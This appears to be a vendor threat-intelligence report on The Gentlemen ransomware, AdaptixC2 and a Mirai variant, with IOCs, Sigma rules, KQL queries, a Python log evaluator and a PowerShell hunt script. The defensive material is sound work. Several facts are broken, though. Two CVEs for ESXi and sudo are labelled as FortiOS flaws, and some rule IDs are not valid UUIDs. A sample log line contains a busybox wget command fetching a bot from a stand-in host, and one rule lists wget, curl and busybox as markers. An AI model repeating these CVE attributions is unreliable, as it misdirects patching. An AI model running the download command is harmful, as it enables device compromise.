Recent OTX pulses highlight a surge in sophisticated Ransomware-as-a-Service (RaaS) and post-exploitation activity. The primary threat actor, The Gentlemen, has aggressively expanded its operations, leveraging recent FortiOS vulnerabilities (CVE-2024-37085, CVE-2025-32463) for initial access and deploying SystemBC malware for covert C2 tunneling. Alongside this, the adoption of the AdaptixC2 framework—an open-source, modular post-exploitation tool supporting Beacon Object Files (BOFs)—is rising among APT groups. Simultaneously, IoT infrastructure remains under assault by the Nexcorium Mirai variant, which exploits TBK DVR devices (CVE-2024-3721) to build botnets for DDoS attacks. The collective objective of these campaigns is data exfiltration, credential theft, and operational disruption through multi-platform encryption and lateral movement.
Threat Actor / Malware Profile
The Gentlemen (RaaS)
- Distribution: Primarily exploits vulnerabilities in public-facing applications, specifically FortiOS and FortiProxy. The group maintains a database of compromised devices to facilitate re-access.
- Payload Behavior: Employs multi-platform lockers for Windows, Linux, NAS, BSD, and ESXi. Uses SystemBC for proxying traffic and Cobalt Strike for lateral movement. Tools like Mimikatz, AnyDesk, and PsExec are utilized for credential harvesting and remote administration.
- C2 Communication: Utilizes SystemBC to establish encrypted tunnels, hiding malicious traffic behind legitimate-looking protocols.
- Persistence: Likely via scheduled tasks and service installation (SystemBC).
AdaptixC2
- Distribution: Dropped by initial access brokers or used directly by APT actors in post-exploitation phases.
- Payload Behavior: Written in Go and C++, supports Windows, macOS, and Linux. Highly modular via Beacon Object Files (BOFs).
- C2 Communication: Supports diverse channels including HTTP/S, TCP, mTLS, DNS, DoH, and SMB, all utilizing RC4 encryption.
- Anti-Analysis: Modular nature allows easy swapping of components to evade signature detection.
Nexcorium (Mirai Variant)
- Distribution: Exploits CVE-2024-3721 in TBK DVR devices via OS command injection.
- Payload Behavior: Multi-architecture support (ARM, MIPS, x86-64). Designed for DDoS attacks.
- Persistence: Modifies init configuration and utilizes watchdog scripts.
IOC Analysis
The pulses provide a mix of infrastructure and file-based indicators:
- CVEs:
  - FortiOS: CVE-2024-37085, CVE-2025-32463, CVE-2024-55591.
  - TBK DVR: CVE-2024-3721.
  - Oracle Solaris: CVE-2020-14871.
  - RDP: CVE-2019-0708.
- File Hashes: Multiple MD5, SHA1, and SHA256 hashes associated with The Gentlemen ransomware payload (e.g., 3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235), AdaptixC2 agents, and Nexcorium binaries.
- IPv4: 176.65.148.186 (Nexcorium C2/Botnet).
Operational Guidance: SOC teams should immediately block the listed IP at the perimeter. File hashes should be uploaded to EDR solutions for threat hunting. Vulnerability management must prioritize patching FortiOS devices and TBK DVRs against the listed CVEs. Log analysis should focus on web server logs for exploit attempts and process logs for the execution of unsigned binaries commonly associated with SystemBC and Cobalt Strike.
Detection Engineering
Sigma Rules
title: Potential FortiOS Exploitation - The Gentlemen
id: 4829a5c0-6a7b-4b3c-9e0d-1f2a3b4c5d6e
description: Detects potential exploitation attempts against FortiOS vulnerabilities associated with The Gentlemen ransomware group (CVE-2024-37085, CVE-2025-32463).
status: experimental
date: 2026/04/20
author: Security Arsenal
logsource:
    category: web
detection:
    selection_uri:
        Uri|contains:
            - '/api/v2/mon/service/lookup'
            - '/remote/login'
            - '/api/v2/cmdb/system/admin'
    selection_exploit:
        RequestMethod: POST
    selection_headers:
        Headers|contains:
            - 'User-Agent: xmlrpc_pc'
            - 'Content-Type: application/'
    # selection_headers is not referenced by the condition; AND it in to tighten the rule
    # at the cost of missing requests that omit those headers.
    condition: selection_uri and selection_exploit
falsepositives:
    - Legitimate administration API calls
level: high
tags:
    - attack.initial_access
    - attack.t1190
    - cve.2024.37085
    - cve.2025.32463
    - the.gentlemen
---
title: SystemBC Proxy Malware Activity
id: 5920b6d1-7b8c-5d4d-0f1e-2g3b4c5d6e7f
description: Detects potential SystemBC proxy malware activity often used by The Gentlemen affiliates for C2 tunneling. SystemBC often runs as a service and makes specific network connections.
status: experimental
date: 2026/04/20
author: Security Arsenal
logsource:
    category: process_creation
detection:
    selection_img:
        Image|endswith:
            - '\svchost.exe'
            - '\rundll32.exe'
    selection_cli:
        CommandLine|contains:
            - '-socks'
            - '-proxy'
            - '127.0.0.1:'
    # Process-creation events carry no DestinationPort field, so a port selection (443, 8080, 8443)
    # ANDed in here could never match; destination ports belong in a separate network_connection rule.
    condition: selection_img and selection_cli
falsepositives:
    - Legitimate proxy software
level: high
tags:
    - attack.command_and_control
    - attack.t1071
    - systembc
    - the.gentlemen
---
title: TBK DVR Exploitation - Nexcorium Mirai Botnet
id: 6a30c7e2-8c9d-6e5e-1g2f-3h4c5d6e7f8g
description: Detects exploitation attempts against TBK DVR devices (CVE-2024-3721) associated with the Nexcorium Mirai variant.
status: experimental
date: 2026/04/20
author: Security Arsenal
logsource:
    category: web
detection:
    selection_uri:
        Uri|contains:
            - '/TBK'
            - '/dvr/'
            - '/device.rsp'
    selection_payload:
        HttpRequestBody|contains:
            - 'busybox'
            - 'wget'
            - 'curl'
    condition: selection_uri and selection_payload
falsepositives:
    - Unknown
level: critical
tags:
    - attack.initial_access
    - attack.t1190
    - cve.2024.3721
    - nexcorium
    - mirai
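As an added example (not part of the pulses or of the Security Arsenal rules above), the two web-category rules are transcribed into a minimal evaluator that implements Sigma's case-insensitive `contains` and exact-match semantics and runs them over constructed access-log lines; the log format, client IPs and request bodies are invented for the demonstration.

```python
import re

# Selections transcribed from the two web-category Sigma rules above, as (field, modifier,
# values). 'contains' is substring, 'equals' is exact; Sigma string matching is
# case-insensitive, and each rule's condition ANDs its selections together.
RULES = {
    "Potential FortiOS Exploitation - The Gentlemen": [
        ("Uri", "contains", ["/api/v2/mon/service/lookup", "/remote/login", "/api/v2/cmdb/system/admin"]),
        ("RequestMethod", "equals", ["POST"]),
    ],
    "TBK DVR Exploitation - Nexcorium Mirai Botnet": [
        ("Uri", "contains", ["/TBK", "/dvr/", "/device.rsp"]),
        ("HttpRequestBody", "contains", ["busybox", "wget", "curl"]),
    ],
}

# Constructed access-log format (not from the pulses): client "METHOD URI HTTP/x" status body="..."
LOG_RE = re.compile(r'^(?P<ip>\S+) "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) body="(?P<body>[^"]*)"$')
SAMPLE_LOG = [
    '203.0.113.7 "GET /remote/login HTTP/1.1" 200 body=""',                        # portal page view: no hit
    '203.0.113.7 "POST /remote/login HTTP/1.1" 200 body="ajax=1&username=admin"',  # FortiOS rule
    '198.51.100.9 "POST /device.rsp HTTP/1.1" 200 body="busybox wget http://example.invalid/bot"',  # DVR rule
    '192.0.2.5 "POST /api/v2/cmdb/system/admin HTTP/1.1" 200 body="{}"',            # FortiOS rule (may be legit admin)
]

def parse_line(line):
    # Map a raw line onto the Sigma web field names the rules reference; None if unparseable.
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {"SourceIp": m["ip"], "RequestMethod": m["method"], "Uri": m["uri"], "HttpRequestBody": m["body"]}

def selection_matches(event, field, modifier, values):
    actual = str(event.get(field, "")).lower()
    if modifier == "contains":
        return any(v.lower() in actual for v in values)
    return any(v.lower() == actual for v in values)

def matching_rules(event):
    # A rule fires only when every one of its selections matches (the 'A and B' conditions).
    return [title for title, sels in RULES.items() if all(selection_matches(event, *sel) for sel in sels)]

def hunt(lines):
    # Return (client IP, URI, [rule titles]) for each line that trips at least one rule.
    hits = []
    for line in lines:
        event = parse_line(line)
        if event and (titles := matching_rules(event)):
            hits.append((event["SourceIp"], event["Uri"], titles))
    return hits
```

The last sample line shows why the first rule lists legitimate administration API calls as a false positive: a POST to the admin CMDB endpoint trips the rule whether or not it is an exploit attempt, so hits on that URI need source-IP and session context before escalation.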
KQL (Microsoft Sentinel)
// Hunt for Gentlemen and SystemBC related file hashes
DeviceFileEvents
| where SHA256 in (
    "3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235",
    "51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2",
    "89dae116c77b0035277d39dfe01043624427c119ddee8883a3ba54a42a6ae400"
)
| project Timestamp, DeviceName, FolderPath, SHA256, InitiatingProcessAccountName

// Hunt for Nexcorium C2 IP connections
DeviceNetworkEvents
| where RemoteIP == "176.65.148.186"
| project Timestamp, DeviceName, RemoteIP, RemotePort, InitiatingProcessFileName
PowerShell Hunt Script
# Hunt for Gentlemen Ransomware and AdaptixC2 Indicators
# SHA256 and MD5 indicators are kept in separate lists so each file is compared
# against the algorithm its indicator was published with (an MD5 value can never
# equal a SHA256 digest, so mixing them in one list silently disables the MD5 IOCs).
$TargetSha256 = @(
    "3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235"
)
$TargetMd5 = @(
    "adf675ffc1acb357f2d9f1a94e016f52", # MD5 from Pulse 1
    "f212fd00d9ffc0f3d868845f7f4215cb"  # MD5 from Pulse 2 (AdaptixC2)
)
Write-Host "Scanning for The Gentlemen and AdaptixC2 artifacts..."
# Scan C: drive for matching file hashes (-File skips directories; -contains is case-insensitive,
# so the uppercase hex returned by Get-FileHash matches the lowercase indicators)
Get-ChildItem -Path C:\ -Recurse -File -ErrorAction SilentlyContinue |
    ForEach-Object {
        $sha256 = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        $md5    = (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
        if (($sha256 -and $TargetSha256 -contains $sha256) -or ($md5 -and $TargetMd5 -contains $md5)) {
            Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
        }
    }
# Check for SystemBC Service Pattern (Common persistence)
# Get-CimInstance replaces the deprecated Get-WmiObject and also works on PowerShell 7
$services = Get-CimInstance -ClassName Win32_Service -ErrorAction SilentlyContinue
foreach ($svc in $services) {
    if ($svc.PathName -like "*proxy*" -or $svc.PathName -like "*socks*" -or $svc.Name -like "*SystemBC*") {
        Write-Host "[!] SUSPICIOUS SERVICE DETECTED: $($svc.Name) - Path: $($svc.PathName)" -ForegroundColor Yellow
    }
}
Response Priorities
- Immediate:
  - Block the IOCs (IP 176.65.148.186) at the network perimeter.
  - Scan all endpoints for the SHA256 hashes associated with The Gentlemen and AdaptixC2.
  - Patch FortiOS/FortiGate devices against CVE-2024-37085 and CVE-2025-32463 immediately.
- 24 Hours:
  - Initiate credential resets for accounts that may have been accessed via compromised FortiGate VPNs or exposed via Mimikatz usage.
  - Review logs for evidence of AnyDesk or PsExec usage (Pulse 3), which indicates active lateral movement.
- 1 Week:
  - Isolate and patch TBK DVR devices and IoT endpoints to prevent Nexcorium botnet recruitment.
  - Implement network segmentation to limit the spread of SystemBC proxy traffic.
  - Review VPN and remote access logs for anomalous login times or locations consistent with The Gentlemen TTPs.